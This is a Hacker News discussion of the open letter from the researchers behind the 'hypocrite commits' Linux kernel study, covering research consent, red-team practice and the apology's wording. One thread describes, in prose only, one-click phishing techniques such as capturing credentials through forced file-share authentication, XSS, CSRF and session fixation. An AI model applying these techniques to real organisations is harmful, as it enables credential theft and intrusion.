Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
Open letter from researchers involved in the “hypocrite commit” debacle (kernel.org)
264 points by marcodiego on April 25, 2021 | hide | past | favorite | 376 comments


There is a major error made by the research group. It starts and ends here: "we did that because we knew we could not ask the maintainers of Linux for permission, or they would be on the lookout for the hypocrite patches."

I am a Red Teamer and work with companies to understand how their detective/preventative/recovery controls and processes are working. Here's how you resolve this:

You work with maintainers to get their coordination on the research. You work out a mechanism to prevent submitted patches from being merged (e.g. maintainers are notified before bad patches accepted by code review processes are merged).

You do not tell them when the patches are coming. You do not tell them which identities are going to be used for the patches (e.g. from which email addresses). You do not tell them which area of code will be targeted. You set rules and time bounds for the study.

You wait some amount of time before submitting such patches (weeks to months). Realistically this is all that's needed. If hypersensitive, set this up earlier and let it bake longer.

At this point, you submit patches from a variety of addresses (probably not associated with your university - it is easy to create many such identities). You also can coordinate with other researchers, universities, and companies to submit patches under identities as needed. You also study submitting from yandex, gmail, .cn and other email addresses (because isn't that interesting to know?).

The premise that there's some ultimatum between working with the community and performing the research is on its face incorrect. This is either ignorance or laziness on behalf of the researchers. Clearly, they hadn't taken the time to work with the community to work out an approach that could be mutually acceptable.


I agree with the approach you’ve outlined.

I also empathize with the plight of the researchers — Linux is a bit different than normal Red Team engagements, in that a normal organization has a hunch of administrative / management layers who typically do not participate in the operations of the system being tested. A VP of engineering at a medium to large company is unlikely to be committing code, much less maintaining the build pipeline etc.

This is not the case with Linux. The people “at the top” are also reviewers, and so it’s pretty likely that notifying them will result in a change of behavior.

I wonder if there is some way to build some sort of Red Team consent “blind trust” organization, such that willing open source projects could agree to responsible attacks, and the attackers could register their work (including disclosure / mitigation plans) with the blind trust ahead of time.


Why do you think there will be any change in behavior ?

It is not like community members are not for look out for bad commits on every new commit from most committers any way, since at least 2003, I think substantially earlier.


This is how it should've been done. Like a war game (at least,as depicted in movies like Periscope Down), the organizers of the study and the project maintainers need to agree on (and be aware of!) bounds of the study, without necessarily knowing all of the details.


> You work out a mechanism to prevent submitted patches from being merged (e.g. maintainers are notified before bad patches accepted by code review processes are merged).

It is my understanding that this happened and that no bad patches were actually merged.


Except there was no consent from maintainers here.


Great plan. Agree with all. Thanks.

In your experience, do you create a "fail safe"?

So for this study, some way for the researchers to prevent any of their patches from ever being released.


>I am a Red Teamer and work with companies

OK, how do you test SocEng vectors? Do you obtain consent and coordinate with every employee that might be targeted to receive your e-mail?

>You also study submitting from yandex, gmail, .cn and other email addresses

No, the point was submitting from a known and respectable entity, which might affect the level of scrutiny. They weren't testing a whole patching process, but a specific human component of it.


You don’t. You work with the leadership & security team. Any employee that clicks your phishing email gets an extra dose of security training. Those that forward the email to abuse@corp.com get a nice compliment


Just clicking the link is enough to fail? No need to enter private info or execute downloaded files? Either your phising emails are badly crafted or you expect employees to see the future.


Agreed. This is something that made me very annoyed when they did it to us. I know exactly what I'm doing, I know that you can't infect a computer from opening a link unless the attacker possesses a new browser 0-day, and expecting your average employee to worry about new browser 0-days is ridiculous.

If it were an obvious phishing URL, like a variation on the company domain, then fine (maybe). But it wasn't.


I've run such phishing campaigns where the link:

1. (Windows specific) Opens up a Windows file share, which causes the person to authenticate to the file share, which through PtH/Responder results in their enterprise credentials being stolen.

2. Exploited a XSS or CSRF attack on an internal/management endpoint. Which in turns allows a pivot from external to internal access.

3. Steals a web session, cached password or authentication token, resulting in compromise of employee credentials to be used elsewhere (e.g. reused to access enterprise VPN).

These are just some not-a-browser-0day examples of a single click being game-over dangerous.


That exploit could happen ANYWHERE on the web. Any freaking link. Anything on a newspaper website, or social network.

You're talking about vulnerabilities in components, or other software, here. The user, by himself, is doing nothing wrong.

Why don't you just restrict employees to the intranet, then? Why do you give them free roam on the whole internet, but then you tell them "don't click the wrong link!".

Phishing happens when the user does something which is actively wrong. When the user opens an Word/Excel with VBA from an untrusted source and bypasses security restrictions. If they execute/install something unsigned and untrusted from some random site.

Click = fail is just wrong. Links are how the internet works. You aren't teaching anything.


> 3. Steals a web session, cached password or authentication token, resulting in compromise of employee credentials to be used elsewhere (e.g. reused to access enterprise VPN).

How do you do this without a browser vulnerability (and assuming it's not also XSS/CSRF like the previous point)?


You can do this with chains of vulnerabilities, including but not limited to insecure redirects, CSP bypasses, insecure cookies. Another useful technique is session fixation - you give your victims sessions you've started and often their SSO experience will connect _their_ credentials to _your_ session.

Also to distinguish between #3 and, XSS in #2 was intended to mean "persistent stored XSS" as opposed to "reflected XSS". In the case of reflected XSS, this can be chained with CSP bypasses and insecure cookies to grab out e.g. bearer tokens.

My overall point is that heap fung shui 0day not required for 1-click ownage. In practice, I've not had to burn browser 0day to compromise organizations or their customers.


I assume you're right on those techniques, but 2 things:

1. It sounds like they'd have to be pretty well targeted against the precise systems of that particular company in order to work. Which would tend to suggest more targeted spear-phishing attacks and extensive recon being done against the company systems somehow before anybody launched a real black-hat attack.

2. At that point, it feels hard to blame the individual employee versus whoever misconfigured those corporate services in the first place. Though I would guess it's fairly common for those kind of things to happen due to many systems being set up without the help of true experts and the unlikeliness of a real attack against them without either a highly-skilled black hat targeting them or securing the services of a skilled and prices pen test team.


1. You are correct. I would measure the effort in terms of a small number (1-3) weeks of recon and targeting for a team of two.

2. I agree. Individual employees are not at all to blame. Companies who are blaming their employees for getting phished are doing it wrong. The correct action to take is to inform employees and build the other kinds of mitigations mentioned elsewhere in this topic tree.


> I've run such phishing campaigns

To test if employees are easy to pish, or was it for real (black hat)?


The former _only_.

I'm usually not testing only whether employees are easy to phish (the answer is pretty much 100% yes). I'm testing end-to-end: can you as a company prevent me from phishing through email protections? Can you detect when I'm phishing your employees? Will your employees report potential phishing emails? Can you figure out (without me telling you) which employees were targeted and which attacks were successful? Can you figure out which credentials/machines would need to be quarantined/rotated/examined?


This job seems like fun :-)

Even more fun if you were allowed to social engineer your way into the office and steal someone's powered on not-screenlocked laptop :-)


Same domain cant garunteed to be safe.


Megacorp I work at does this. I think I've had around 1 phishing mail per month for the last year or so, and yes, just clicking the link is enough to fail.

It's particularly annoying where I work, as the company itself sends out a completely unreasonable amount of internal spam every.single.day - often with bad spelling/grammar, and very often with the contents being a single image with rendered text (why?!?!).


A popular phishing test vendor populates message headers with a very specific word that you can build a mail rule from. In three years it has flawlessly identified every test sent my way with zero false positives.


> Just clicking the link is enough to fail?

Yes, clicking on links is dangerous[0].

0. https://www.bleepingcomputer.com/news/security/google-fixes-...


So, we don't click on links anymore? Anywhere on the internet? Just about any site can deliver a malicious link.

How can I tell whether I can click on a link? Sometimes there's even something like linkprotector.outlook.com/[very_long_url] in corporate emails.

My usual approach if I'm unsure whether a link is malicious would be to open it in a private window (and probably in a different browser from the one I usually employ), or if I really think it's phishy, I would open it from within throwaway VM.

So, the blanket "click and fail" policy seems pointless to me. If I enter some login/PII, then I can agree I've failed the test. But a click on a link cannot be considered failure.


> No, the point was submitting from a known and respectable entity

They weren't, though - their own paper explicitly says they used newly created Gmail addresses for the patches...

"We submit the three patches using a random Gmail account to the Linux community and seek their feedback—whether the patches look good to them."


I think it would be obvious that you work with the organisation security team and not individuals.


This apology fails from the 5th word:

"We sincerely apologize for any harm..."

While there are other requirements, a sincere apology cannot in any way entertain doubt about the fact that there WAS harm.

Truly acknowledging the harm done is foundational to a real apology, and most of us (myself included) end up sneaking in weasel words or phrases like this.

Psychologically, its nice for the apologizer, since it allows one to think "i'm being good by apologizing, but maybe I didn't do anything bad after all?".

But from the apologizee standpoint, these phrases are often devastating and can make it clear that the apologizer has no real recognition or care of what happened.

Personally I've worked pretty hard to try to remove these sorts of phrases from my apologies. It's not easy. It makes you feel much more vulnerable and you really have to let whatever you did sit with you in a very uncomfortable way. But it's worth it.


Exactly my feeling too when I read this apology.

For me, it reads like this "With the best intentions, we were helping you. Unfortunately, you are too stupid to not realise this. We are sorry that we hurt your feelings, but please let us continue in helping you."

When you get such an apology, best thing is to avoid such people. Because it's clear they do not understand where they went wrong.

They should have either apologized with "we made a very big mistake that had a negative impact, it did more harm than good". Or they should have argued with real evidence on how they improve the Linux kernel, like refer to real exploits that they fixed.

This is just a "we're sorry that you don't realize we are helping you"


The issue I have with the letter (not being involved at all and just following) is that it feels like an apology of the bully at school that took your lunch money, and the parents found out.

Honestly, for all we know this letter could be meaningless. A real good actor would also reveal the other commits in order to have a full disclosure.

Trust isn't based on promises, trust is based on past actions. Therefore they should be treated as such, as their actions are evidence for being a potentially malicious actor.

I'm still convinced Greg did the right thing here, as it's better to be safe than sorry in this case due to the sheer scale of an attack vector that the actors might have introduced.

Even if other commits of good actors at the same University are now treated with more attention to their code, I think they are a casualty that was predictable in the moment the ethics commitee signed off the paper's research procedure.


This interpretation looks flawed. You discredit the entire message based on a single word--a very general word whose meaning you pinned to a definition which results in the most negative interpretation--and you also ignore the fact that they explicitly state the damage it caused in the same paragraph.

To clarify: I'm not arguing this is a good or bad apology; just that the justification provided here looks flawed. Human speech isn't a programming language; it's not well defined and it's more than the sum of its parts. One can't derive conclusions about a text by analyzing a tiny subset out of context.


If this was a transcript of a spoken apology I might be of your train of thought, but this was a composed letter looked over by (ostensibly) multiple folks. The wording was a choice.


Strongly agree with your sentiment; any premeditated/composed message is held to a higher standard (and rightfully so). I'm not arguing that one shouldn't analyze the wording, but that the analysis here is flawed (for the reasons I stated).


I would argue at this point in collective awareness of public communications, using a form of "sorry if I did any harm" regardless of specific words used is an explicit decision by the writer to not accept full culpability. I agree with original comment, when you see a weasel apology introduction, reading the rest is of little value.


> I would argue at this point in collective awareness of public communications, using a form of "sorry if I did any harm" regardless of specific words used is an explicit decision by the writer to not accept full culpability.

Based on my experience with the general public, with academics, and with industry folks, the criteria for what constitutes a sincere apology is not known by the majority. Furthermore, many of those who have heard the criteria do not accept it as a gold standard, and disagree with it (even those who are not being looked to for an apology).

The recipient can always choose to accept or not an apology. However, I find it quite distasteful to attribute intentions to someone simply because they did not follow a recipe (even if the choice not to was intentional).


I find it nicely clear in German. If you wrong someone, you're loading guilt unto yourself ("mit Schuld beladen"). You'll then ask to be forgiven ("um Entschuldigung bitten" is "asking to be relieved of the guilt"), and the other party can lift the guilt ("entschuldigen"). You can also say "ich entschuldige mich", which skips that step and is essentially "I absolve myself".

While it's common in colloquial German to use the one-step-absolution and skip over the possibility of the other party not absolving you, it's also often considered rude when it matters and has a taste of "but not really". It's fine when you accidentally stepped on someone's foot, but not so much when you've stolen their car.


“I’m sorry if I hurt you,” is a very different statement from, “I am sorry I hurt you.” One makes responsibility conditional, and the other takes responsibility.


I actually bounced from the text at that point as well. It taints the whole thing and makes it feel contrived.


Strong disagree. You should always apologize for _what you did_ not the _effects_ of what you did. Lead with and more strongly emphasize your actions and how they were inappropriate.


"Please respond to the strongest plausible interpretation of what someone says, not a weaker one that's easier to criticize. Assume good faith."

https://news.ycombinator.com/newsguidelines.html

I think it's both unfair and non-constructive to pick apart a apology letter based on one word like that. Let's assume good faith, especially when the writer's English might not be their first language (based on their name).


I think this response misses the point. The purpose of an apology is to make the recipient feel that you're sorry. That means thinking about how word choice is received is critical in crafting a good one. Your parent isn't saying the author's choice of words is in "bad faith", they're saying the author's word choice falls short of an effective apology due to a mistake that's common and easy to make. I agree, and I have done this myself in the past.


It seems like a nitpick to me, since the rest of the apology uses the proper choices of words, though. "The method used was inappropriate", "we made a mistake", etc.

The apology is also specific about what they did wrong despite their intentions. It really is a good apology after reading past the first six words.


ESL here. How correct is it to use ’any harm’ to mean ‘all harm’.


1) "We apologize for any harm we might have caused"

2) "We apologize for any harm that we caused"

3) "We apologize for all the harm that we caused"

(1) is the least apologetic. This could be interpreted as saying "we might or might not have caused harm, and we think we didn't but you think we did, so we're going to apologize for your sake, but we're not really sorry because we didn't do anything wrong from our perspective".

(3) is the most apologetic. You acknowledge that you did something wrong, and that you're apologizing for it. This might be followed up with a specific list of the things that you did wrong, and that you are apologizing for. That would make for the most sincere apology. This could be interpreted as "we caused harm and we're sorry, whatever harm you think that we did, we agree that you are right, and we are sorry for all of it".

(2) is partway between (1) and (3). You acknowledge you caused harm, but you won't enumerate the things that you did wrong. So, you leave yourself a little bit of wiggle room. This could be interpreted as "we caused harm and we're sorry, but we didn't cause that much harm, we think it was actually quite little, you think it was a lot, but we're saying sorry, so let us go with this apology".


A sincere written apology should be 3. You needn’t misrepresent your own intentions to do this, but it does require thinking about the specific harms you have caused (perhaps unintentionally) and enumerating them in a way that doesn’t minimize their import. That is the anatomy of a true apology. It requires taking the other perspective as fact.


There isn’t much difference and both are really correct. The problem with ‘any’ as raised here is the ambiguity. It could be taken to mean ‘any harm, if it occurred’ or ‘any single bit of harm that did occur’. So in this sense ‘all harm’ would be safer and less ambiguous.


That depends on the sentence context.[1] As used here it is fully correct; "we sincerely apologize for all harm our research group did" would be highly anomalous, whereas the phrasing they actually used is conventional.

"We sincerely apologize for all the harm our research group did" would be a little less unnatural than "...for all harm...", but it's still an unusual choice of wording that ends up sounding like you want to emphasize that you did an unusually large amount of harm.

A more standard phrasing that includes the word all would be "We apologize for any and all harm...".

The standard form I know is actually "[I am deeply sorry] for any harm I may have caused..."; the letter here does not use a modalized verb. (Compare their "We sincerely apologize for any harm our research group did...".) In that sense it's more definite than usual. The criticism above is strange.

(The reason for the modality in the standard form isn't really to leave open the possibility that you didn't do any harm. It's to leave open the possibility that you did harm you don't even know about -- and therefore can't apologize for specifically.)

[1] In general, any occurs only in negative sentences, though in the details there are several types of sentences that are sort of "honorarily negative" for the purposes of allowing any and other words that obey the same restrictions.


How about "we apologize for the harm"?


You want my opinion? It's possible, it's less standard than the "for any harm" form, but it means roughly the same thing.

It wouldn't have occurred to me to discuss it above, because I thought I was contrasting any with all, and neither is present in that example. But I'd rate it above most of the alternatives discussed (while still below "for any harm").


Not correct, at least in this context. "Any harm" means there could be no harm, or some harm, but "all harm" admits there was harm. I.e. "any" is not an admission of doing harm, or an acceptance that it happened.

If you want to apologise, "all harm" admits you caused harm, which seems necessary for an apology. "Any" is a bit like those "I'm sorry if you were offended" non-apologies, though in this case the rest of the message does better than that.


I would go with "We apologize for the harm [that] we caused" which seems the most natural choice while explicitly acknowledging that some harm was caused. "All the harm" does indeed come across as a bit inflated, as other commenters have mentioned.


As others have said, 'any harm' implies that there might be none, while 'all harm' implies there is definitely some harm. So, 'all harm' is definitely the better choice of words for an apology (in this context.)

I am surprised to see people hung up on this, because the rest of the letter acknowledges specific harms done. To me, it really seems like a minor thing, and something that I might have written (as a native English speaker.)


We are talking about deliberate security vulnerabilities in the Linux kernel, a piece of critical infrastructure. Frankly, this is not the place to assume good faith.


But they did not introduce security vulnerabilities as there prevented the bad patches from being merged


Those measures were insufficient, as according to the developers, a number of the bogus patches were merged and had to be reverted.


Sort of?

The "hypocrite commits", according to the researchers' own paper, originated from "random Gmail addresses", and the researchers continue to claim none of those got merged (though since they haven't told us what they were, ...)

The additional claim is that some of the commits not covered by their "hypocrite commits" (and thus, submitted from their UMN addresses) contained security bugs, deliberate or not, and the loss of trust in the researchers is sufficient to justify reverting all of their commits until they can be reviewed.


I think the kernel maintainer reverted all the patches coming from that university, regardless if they were bogus or not.


> English might not be their first language (based on their name)

This is a pretty weak assumption. Someone's name (and physical appearance) don't give you an accurate information about anything.


I don't think it's that weak of an assumption. First, considering all the people with foreign names in relevant groups (multinational corporations, or in this case, a researcher/ student at a university), I would say the chances that their first language is not English is high enough to be a consideration. And even if it is, there are also regional variations regarding what are common and accepted ways of phrasing things. Second, similar to the rule used here at HN, giving the text a more charitable read should be the starting point.


those guidelines only apply to members of this community. Not an outside article. We should assume all users on hn honour the guidelines. We don't need to assume outside articles do.


I read it as a comment that was criticizing the language, not the intention of the apology. As such they are not inferring that the apology was insincere but pointing out language that in the apology that the posted has often added themselves that gives the appearance of insincerity of the recipient. To me that is the strongest possible interpretation of the comment you are replying to.


That’s responding to comments on HN. This apology wasn’t on HN.


In researcher's shoes, I would retract paper from IEEE, only then send open latter. Because they did not do this, does not looks like there's open letter is sincere, I am sure researcher's aware that there where multiple complaints regarding there's paper before ban. The least they could have done is acknowledge such failures in open letter.


This is probably because they don't mean the apology, they were forced to write it by their administrators.

And to be honest, I kind of agree with them. I don't really see what they did here as particularly bad. They demonstrated a very serious vulnerability in the linux kernel development process. I guess the harm they caused was wasting maintainers time, a bit? But what we all got out of it is the knowledge that real bad actors could easily have done this too. It's odd to me that people are focusing on like, the etiquette here when such an important vulnerability was demonstrated.


The purpose of the research was to publicly announce that that the research subjects (who did not consent to being studied) messed up. The research consisted of submitting patches specially crafted to make sure the (non-consenting) subjects did indeed mess up.


Ya, I get that. But the point was to demonstrate that the project was vulnerable to this kind of attack - which it was. That's an extremely important finding.


They performed an experiment on human subjects without informed consent.


Sure, but so does every website that AB tests a landing page. Consent is only relevant when there is some risk to the subject (or something they value, like privacy, etc).


What about the risk to the reputation of anyone who approves these patches? Or of intentinally buggy patches making it into the wild and being exploited?


> What about the risk to the reputation of anyone who approves these patches?

This is a risk, but it's exposing vulnerabilities is always preferable to leaving them in place.

> Or of intentinally buggy patches making it into the wild and being exploited?

There was no real risk of this. They specifically did not allow it to make its way into real releases.

If they had allowed it into actual releases, I would have a serious problem with that.


There is also the risk that a third party sees the patch on a mailing list, and merges it to his internal branch because it looks like it is fixing one of his problem.

But I'd argue it is his own fault to use unsupported patches.


> Consent is only relevant when there is some risk to the subject

Says who? I don't think that's true according to IRB standards in the US. Nor is it true for websites who A/B test according to the GDPR


> Says who?

Me and common sense. I don't believe consent is relevant when there is no risk of harm to the subject. IRBs and the GDPR are overly aggressive on this point, probably as a reaction to real and important violations of privacy. But the idea that A/B testing the color of your CTA button on a landing page requires informed consent is absurd.


> But the idea that A/B testing the color of your CTA button on a landing page requires informed consent is absurd.

A/B testing on major platforms is much more sophisticated than that[1].

It's a crucial practice for advertisers and marketing teams that dives deep into researching the psychological response towards images, text and dozens of other variables. Human subjects are acting as lab rats in order to extract some data points to drive the next test and campaign.

So, yes, it should definitely require informed consent and opting in.

[1]: https://www.bbc.com/news/technology-28051930


> A/B testing on major platforms is much more sophisticated than that[1].

On some it is, and some it isn't.

> It's a crucial practice for advertisers and marketing teams that dives deep into researching the psychological response towards images, text and dozens of other variables. Human subjects are acting as lab rats in order to extract some data points to drive the next test and campaign.

This is just a long and emotionally laden way of saying "changing images and text to see which works best".

> So, yes, it should definitely require informed consent and opting in.

Guess we're just going to have to agree to disagree then. I don't see any reason whatsoever to think that this practice is harmful to the subjects being experimented on.

At worst, it's harmful to society in general because it incentivizes consumerism and potentially self destructive behavior. But that is completely orthogonal to the issue of informed consent. If you got perfectly informed consent from 10,000 people to tease out the perfect pitch text, and then deployed it against the rest of the population, the effect would be exactly the same, whether or not you got consent.


There's lots of systemically horrible things that can happen if you're not careful about what you allow. If you're interested why these ethical principles exist in the United States, I suggest you at least skim the Belmont Report

https://en.wikipedia.org/wiki/Belmont_Report


> There's lots of systemically horrible things that can happen if you're not careful about what you allow.

Of course there are. But what specifically are the harms that are going to be caused by either this research or a landing page A/B test without a click through pop up? The existence of theoretical harms for broad categories of potential research does not have a whole lot of bearing on these specific lines of research.

> If you're interested why these ethical principles exist in the United States, I suggest you at least skim the Belmont Report

I read it. It was interesting, but I don't think it's particularly relevant here. The only prong of its test that would be relevant to this experiment is "respect for persons". The idea that somehow not revealing the bug or the experiment was intrinsically harmful as a violation of a person's moral autonomy.

I don't buy that line of reasoning, and I can't really think of any valid consequentialist justification for it, and the report itself does not attempt to justify it either, as far as I can tell.


If I sit across the street from your house in a van and observe your life, noting down the times you come and go, and logging what I can see through your window, and then using that data to market things to you, would you agree that you'd rather be able to provide and withdraw consent for this activity? No harm done to you.


I think it's reasonable to consider invasion of privacy a harm on its own. There was no invasion of privacy in this example.


If anything they wasted time and energy of project maintainers. This alone should be enough to see the behavior is inexcusable.


Ya, they wasted a bit of their time. That wasn't very nice. But it's hardly the great crime it's being made out to be, and what they did was a huge public service. It's impossible to over-state the importance of linux kernel security.


You don't get to decide what you think is important and then burden others pushing it. If you think testing security in random attack way is important tell the people who run the project. They are the ones qualified to make the calls.

It's just a scammy move at best. To me it's borderline criminal to sabotage a project like that.


This is the part I'm personally most interested in. Research generally has pretty strict ethical regulations about consent. I'm wondering if this would qualify as a violation of any of their university's or the conference's rules.


That's how security is tested. TSA undergoes undercover testing.

https://abcnews.go.com/US/tsa-fails-tests-latest-undercover-...


TSA agents are informed that there are tests as part of their job. See this comment for another example of informed consent in security testing

https://news.ycombinator.com/item?id=26929797


Their biggest crime seems to be they just aren't great developers. If you look at the patches they presented which to their knowledge were correct you'd see they couldn't have done anything useful. Because of their earlier work this was taken as intentional malice, but if they had been submitting great work it wouldn't be an issue.


What is the serious vulnerability? That sometimes bugs slip through?


How extremely easy it is for a nation state or other malicious actor to intentionally introduce bugs.


Was there ever any doubt?


Perhaps not, but was it on people's radar as much as it is as a consequence of this event?


That fifth word is a mistake and the apology certainly has flaws, but you are being extreme.

A more substantial criticism is that blending we’re sorry with excuses and mitigating explanations is what makes it lose impact.

But really, they acknowledge the harm they did and they said sorry and I hope you give them some credit for doing so.


In some variations of English any can mean the same as all in some cases where you are uncertain you know every possible harm.

Indeed: "The Court held that "the word 'any' is to be considered all-inclusive"

https://www.michbar.org/file/generalinfo/plainenglish/pdfs/9...


> end up sneaking in weasel words or phrases like this.

Honestly, based on the way they handled their "research" in the first place, sneaking weasel words into an open apology letter is entirely par for the course...


Oh yeah, the "mistakes were made" passive-voice non-apology apoplogy. zzzz


Your critique seems more about waffle words in apologies and less about this specific apology. While they do waffle in that sentence, on the whole, their apology seems pretty sincere. They acknowledge their error and the harms they perceive they caused. As a linux user, I am inclined to accept.


I too bristled at the word “any” for an apology.

I would have listed the specific harms in a concise manner instead.

Maybe save that word “any” for the end, maybe and only as a future tense of profusely avoidance of future harm.


Wait. 'Any' can mean 'none at all' in this context?


> a sincere apology cannot in any way entertain doubt about the fact that there WAS harm

Someone will always be apologizing wrong for some. Some interpretation of what harm there was, is not necessarily the same as my interpretation. There are too many ways to construe what harm there was or may have been according to others to satisfy everyone addressed. This is an efficient wording that doesn't explicitly satisfy your (and many people's) specific issues out of "the community", which illustrates the point.


"If you give me six lines written by the hand of the most honest of men, I will find something in them which will hang him."

I understand doubting the sincerity of the authors, but this argument hinges here on them saying "any" instead of "all" and they are often used interchangeably in casual conversation.


This isn’t casual conversation. This letter should be a full, formal apology.


I really appreciate the apology and as they stated, its unconditional nature. Good.

However, I find something very problematic. This quote shows it:

"We have learned some important lessons about research with the open source community from this incident."

This is something I don't like. This is not something about "research with the open source community". If anything, they should have learned something about treating human beings as persons and not as involuntary guinea pigs. They should have learned something about not breaking anyone's (not only any open source community) good faith and trust, and respecting that.

They behaved like jerks and they still cannot see that.


I think there is something to be applauded about people who genuinely apologize even though they can't see things from the other person's point of view.

They didn't decide to conduct this research on a whim. They had full approval of their university ethics board as well. They published a paper and had it peer reviewed without (as far as I know) anyone immediately calling for their heads.

They can't immediately turn heel face and believe their actions are wrong, always were wrong, and the wrongness should have been obvious to them.

Yet, despite this they recognize the hurt they've caused and are genuinely apologetic and will never do it again. Asking them to dismantle their world view in a week is a bit much, even criminals are given a few years of quiet contemplation before being asked to tell a parole board they have changed their hearts and minds.


That only tells me, that there's more garbage than just one individual.

If they lack knowledge of why it was bad, what will prevent them from doing another garbage study next time.


This incident, time, and reflection.


But their self-relfection, and I say basic ethics is severely lacking.

This study could have been done with consent, with limited bias, but they chose to go the idiot route.


This paper had multiple issues that they where aware of before the ban, original ban email indicates that complaint was made before to there's university, on twitter feed one of the researchers stated that IEEE received also complaint regarding ethics of the paper, way before ban.


They only sought approval from the ethics board after the fact IIRC


"If anything, they should have learned something about not treating human beings as persons and not as involuntary guinea pigs."

Perhaps the entire "tech" industry needs to learn that lesson. Non-technical end users should be entitled to that same level of trust as nerds. I can download free open source code, extract a tarball and build the software without worrying too much about scanning through all the files first for phone home/telemetry/OriginTrials nonsense.^1 However non-technical end users who use programs compiled for them by "tech" companies with ads and surveillance as their "business model" are not entitled to the same trust. I cannot think of any justification for the difference.


> Perhaps the entire "tech" industry needs to learn that lesson.

Audit studies are conducted all the time where researchers lie to people and waste their time.

> Factors Determining Callbacks to Job Applications by the Unemployed: An Audit Study

> We use an audit study approach to investigate how unemployment duration, age, and holding a low-level “interim” job affect the likelihood that experienced college- educated females applying for an administrative support job receive a callback from a potential employer. First, the results show no relationship between callback rates and the duration of unemployment. Second, workers age 50 and older are significantly less likely to receive a callback. Third, taking an interim job significantly reduces the likelihood of receiving a callback. Finally, employers who have higher callback rates respond less to observable differences across workers in determining whom to call back. We interpret these results in the context of a model of employer learning about applicant quality

http://www.econ.ucla.edu/tvwachter/papers/audit_study_Farber...


This is a very good point. I did not find anything objectionable about that experiment when I first read about it. And if the companies experimented upon had complained like the kernel maintainers did, I would have dismissed it as them covering up their bad process. This is actually making me consider that the submitters of the bad patches shouldn't be treated differently than the job application researchers.


Very good point. We seriously need to learn this lesson as you said.


Several parts read strangely to me

> we are very sorry that the method used in the “hypocrite commits” paper was inappropriate

This reads more as "sorry you were offended" than "It was inappropriate and we are sorry".

> As many observers have pointed out to us, we made a mistake by not finding a way to consult with the community and obtain permission before running this study; we did that because we knew we could not ask the maintainers of Linux for permission, or they would be on the lookout for the hypocrite patches.

Bringing up why you did something in an apology is very shaky. Like in this case, it can sound more like justifying / excusing.


> Bringing up why you did something in an apology is very shaky. Like in this case, it can sound more like justifying / excusing.

Why is that a problem?


Answering myself: the apology feels more like a justification as to why they did, not an understanding of why they shouldn’t have.


> the apology feels more like a justification

Which I'm guessing is why they made it an open letter. This isn't about acknowledging their misdeeds and trying to fix their relationship with the OS community, this is them trying to sneak in spin and justifications to a public announcement to cover their collective asses, to put forth a false narrative that shows their actions in a better light than they acted in.


>They behaved like jerks and they still cannot see that.

They just come off as disconnected academics. Samething with the experiments with algorithms from Facebook. They are so wrapped up in what they are doing, they no longer see the "users" as human beings. There are some times this is almost required to survive like being an ER doctor. If you lose that many people, it could be debilitating unless you were able to disconnect. That's far and away much different than these robots.


Imagine if instead they did this research with the closed source community. You know, get hired under false pretenses, sneak some vulns into some commercial product, write a paper about how easy it was. Pretty sure if they tried that they would be in jail right now.


There are literally companies you can hire that will go this far pentesting your company and the employees involved are not in on it.

How else do you prove your process can stop real infiltrators by state actors?


So? The difference is consent (in your case of the owners of the company).

There are many crimes in the world that are only crimes if you do it without consent.

> How else do you prove your process can stop real infiltrators by state actors?

One of the common security controls against infiltration by foreign nation states is espionage being a capital offense. Well obviously not appropriate, i think that its pretty obvious that these researchers would have not succeded if they faced the electric chair like a spy would. So i don't think the comparison is apt.


So if we get consent from a C-level at a company, we don't need consent from every other lower level person we trick?

If you have approval from one person in an org of 100,000 is this still okay?

It has to be, because getting explicit consent from every person in the org at that size would be untenable, and make them artificially extra vigilant during a potential audit window.

Well now scale this to open source. The typical web project has 2k+ random nodejs libs in their dependency tree. These are all separate orgs/individuals.

Real world bad actors are backdooring these projects constantly. I specialize in this area of research.

If every white hat has to get permission from exponentially large dependency chains, they will never even come close to being able to compete with black hats here finding the weak links of the chain.

The blackhats set the rules of engagement, for better or worse. White hats should be free to go for it just like with any other vulnerability they evaluate.


> So if we get consent from a C-level at a company, we don't need consent from every other lower level person we trick?

You have to get consent from someone who has legal authority to give it to you.

> If every white hat has to get permission from exponentially large dependency chains

They don't. They just have to get permission from someone in authority. Different open source projects have different governance structures. Sometimes that is a single person.

> The blackhats set the rules of engagement, for better or worse. White hats should be free to go for it just like with any other vulnerability they evaluate.

If you are hacking someone elses system without their consent (not to mention for your own personal gain), you are a blackhat. By definition. Pretending to be a researcher doesn't change that.


> you can hire

there lies the difference, duh.


And what about the hundreds of NPM dependencies in VS Code no one reviews?

Or the the thousands of brew packages that are blindly merged unsigned by 800 people with access?

Who pays to give a white hat as much freedom to find supply chain attack vectors here? Who gets consent from every random student whose code, if compromised, would compromise every major company?

We have created a massive mess, and I don't know that we will be able to hire enough researchers to fix it.

We are going to need unpaid volunteers, and a lot of them.


holy moving the goalpost batman, slow down.

> We are going to need unpaid volunteers, and a lot of them.

that's absolutely orthogonal to the question at hand, it's not a matter of paid or unpaid, neither being volunteer or not: it's a matter of consent.

if you don't sought consent beforehand either via a contract relationship or a sponsored bug hunt program or the likes, you're a racketeer, not a white hat, and you should (and will) be treated as such.


Going further, "with" seems like the wrong preposition. "On" seems more accurate.


The professor is not a native English speaker. I’d cut him some slack in minor issues with his word choice.


It would make sense if they were talking about mice, in which case "on" is still more accurate but "with" is probably correctly assumed to be equivalent. Research with humans involves them being on the author list...


Additionally, would be right thing to do with there's apology email to also state that they retracted "hypocrite commit” paper from IEEE ?

After all before a ban, there where complaint(s) made regarding this paper, by other researchers and community members.


This falls under behavioral research. I believe psychologists have solved the problem of how to research that is both blind and in line with ethical standards. All they had to do was ask one.


I also found the apology lacking in that they did not specifically acknowledge that they were indeed experimenting on people.


Is it now not P.C. to discuss what they revealed? Or "nothing" has been revealed?

Are we not allowed to discuss the possibility of someone hacked an university email address and then submit a patch?


You're being too coy. What do you think was revealed?


The thing I’m still missing is a detailed explanation of what the heck was going on with the recent bogus commit that triggered the banning. Supposedly the “hypocrite commit” research was all done in 2020 and is now in the past. So what was going on with this latest bad commit? The student who submitted it claimed it was generated by a static analysis tool, which kernel maintainers have plausibly called bullshit on. Was that student lying? If so, what were they actually doing? If not, it seems absolutely necessary at this point to prove that they were telling the truth by publishing how that commit was produced, including the tool’s source code and how it was invoked. Even if the campaign to intentionally introduce security flaws was over in 2020, the more recent issue is that the same research group submitted an apparently intentionally incorrect patch and then seems to have lied about its provenance and why it was submitted. Until that’s cleared up any kind of apology feels premature and impossible to evaluate. How can anyone decide if an apology is sincere without understanding what was done?


